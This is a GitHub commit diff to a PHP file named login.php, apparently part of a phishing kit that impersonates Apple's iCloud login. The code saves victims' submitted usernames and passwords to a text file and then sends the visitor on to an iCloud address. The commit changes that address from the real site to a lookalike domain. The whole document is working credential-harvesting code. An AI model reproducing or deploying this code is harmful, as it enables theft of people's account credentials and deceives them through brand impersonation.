Update login.php

This commit is contained in:
Usama Abdul Sattar 2018-07-13 17:02:59 +05:00 committed by GitHub
parent e8e5dc278e
commit dc2fc1be7a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,5 +2,5 @@
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://icloud.com');
header('Location: http://icloud.cdn-apple.com');
exit();